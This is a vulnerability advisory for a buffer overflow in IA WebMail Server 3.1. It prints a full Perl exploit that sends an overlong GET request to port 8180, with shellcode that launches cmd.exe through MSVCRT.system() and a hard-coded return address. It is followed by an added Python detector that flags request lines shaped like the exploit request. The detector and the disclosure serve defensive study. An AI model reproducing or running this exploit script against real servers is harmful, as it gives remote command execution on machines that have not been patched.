IA WebMail Server Buffer Overflow Exploit

Summary

As we reported in our previous article, IA WebMail Server Buffer Overflow Vulnerability, a vulnerability in IA WebMail allows remote attackers to overflow an internal buffer and overwrite the saved return address (EIP). The following exploit code can be used to test your system for the mentioned vulnerability.

Credit:

The information has been provided by SecurITeam Experts.


Details

Vulnerable systems:
 * IA WebMail version 3.1

Exploit:
#!/usr/bin/perl
use IO::Socket;

unless (@ARGV == 1) { die "usage: $0 host ...\n" }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto    => 'tcp',
                                 PeerAddr => $host,
                                 PeerPort => '8180',
                               );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

$remote->autoflush(1);

# Payload: writes the string "cmd.exe" onto the stack and calls MSVCRT.system()
# through a hard-coded address (see the MOV EAX below).
$shellcode = join ('',
"\x90",                 # - NOP
"\xCC",                 # - INT3
"\x90",                 # - NOP
"\x90",                 # - NOP
"\x90",                 # - NOP
"\x90",                 # - NOP
"\x8B\xEC",             # - MOV EBP, ESP
"\x55",                 # - PUSH EBP
"\x8B\xEC",             # - MOV EBP, ESP
"\x33\xFF",             # - XOR EDI, EDI
"\x57",                 # - PUSH EDI
"\x83\xEC\x04",         # - SUB ESP, 4
"\xC6\x45\xF8\x63",     # - MOV BYTE PTR SS:[EBP-8],63h
"\xC6\x45\xF9\x6D",     # - MOV BYTE PTR SS:[EBP-7],6Dh
"\xC6\x45\xFA\x64",     # - MOV BYTE PTR SS:[EBP-6],64h
"\xC6\x45\xFB\x2E",     # - MOV BYTE PTR SS:[EBP-5],2Eh
"\xC6\x45\xFC\x65",     # - MOV BYTE PTR SS:[EBP-4],65h
"\xC6\x45\xFD\x78",     # - MOV BYTE PTR SS:[EBP-3],78h
"\xC6\x45\xFE\x65",     # - MOV BYTE PTR SS:[EBP-2],65h
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
"\x50",                 # - PUSH EAX
"\x8D\x45\xF8",         # - LEA EAX, DWORD PTR SS:[EBP-8]
"\x50",                 # - PUSH EAX
"\xFF\x55\xF4",         # - CALL DWORD PTR SS:[EBP-C]
"\x5F"                  # - POP EDI
);

# Return address 0012f84C, written little-endian; this is what lands on the saved EIP.
$eip = "\x4c\xf8\x12";

#$eip = 'AAAA';
$request = join ('', 'GET /', $shellcode, 'A' x (1040 - length($shellcode)), $eip,
                 " HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n");

print $remote $request;
sleep(1);

close $remote;
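As an added example from the defender's side (this is not SecuriTeam's code and is not part of the original advisory): a small Python check that inspects the request line of a captured HTTP request for the traits of the exploit request above, a target far longer than any legitimate WebMail URI, non-printable bytes inside it, and a request line that does not parse as "METHOD target HTTP/x.y". The 1024-byte threshold and the two sample requests are assumptions constructed for this example; the oversized sample uses plain filler and contains no payload.

```python
"""Flag HTTP request lines shaped like the IA WebMail overflow request.

Added example, not SecuriTeam's code.  The exploit above sends one GET whose
target is about 1040 bytes of payload followed by a return address, to port
8180.  This module parses a raw request and reports the checks a proxy or IDS
can apply cheaply: an oversized target, non-printable bytes in it, and a
request line that is not well formed.
"""
from dataclasses import dataclass

# Assumed threshold: the exploit fills 1040 bytes before the saved EIP, so a
# legitimate IA WebMail URI should be comfortably shorter than this.
MAX_TARGET_LEN = 1024


@dataclass
class RequestFinding:
    method: str
    target_len: int
    oversized: bool       # target longer than max_target_len
    non_printable: bool   # target contains bytes outside 0x20..0x7E
    malformed: bool       # request line lacks "METHOD target HTTP/x.y"

    @property
    def suspicious(self) -> bool:
        return self.oversized or self.non_printable or self.malformed


def inspect_request_line(raw: bytes, max_target_len: int = MAX_TARGET_LEN) -> RequestFinding:
    """Parse the first line of a raw HTTP request and check its target."""
    first_line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    parts = first_line.split(b" ", 2)
    if len(parts) == 3:
        method, target, version = parts
    elif len(parts) == 2:
        method, target, version = parts[0], parts[1], b""
    else:
        # No spaces at all: treat the whole line as the target.
        method, target, version = b"?", first_line, b""
    return RequestFinding(
        method=method.decode("ascii", "replace"),
        target_len=len(target),
        oversized=len(target) > max_target_len,
        non_printable=any(b < 0x20 or b > 0x7E for b in target),
        malformed=not version.startswith(b"HTTP/"),
    )


def flag_suspicious(requests):
    """Return the indices of requests whose request line looks like an overflow attempt."""
    return [i for i, raw in enumerate(requests) if inspect_request_line(raw).suspicious]


# Constructed samples (not captured traffic).
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Connection: close\r\n\r\n"
)

# Same shape as the exploit request: 1040 bytes of filler in the target, then
# three non-printable bytes where the exploit places the return address.
# Plain 'A's stand in for the payload; no shellcode is included.
OVERSIZED_REQUEST = (
    b"GET /" + b"A" * 1040 + b"\x01\x02\x03" + b" HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Connection: close\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, OVERSIZED_REQUEST):
        f = inspect_request_line(raw)
        print(f"{f.method} target_len={f.target_len} suspicious={f.suspicious}")
    print("flagged:", flag_suspicious([BENIGN_REQUEST, OVERSIZED_REQUEST]))
```

Feed it request lines pulled from a proxy log or a packet capture of port 8180; a request that trips all three checks at once is very unlikely to come from a real client. The check is deliberately coarse: it identifies traffic shaped like this exploit, and says nothing about whether the server that received it was actually vulnerable or was patched.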
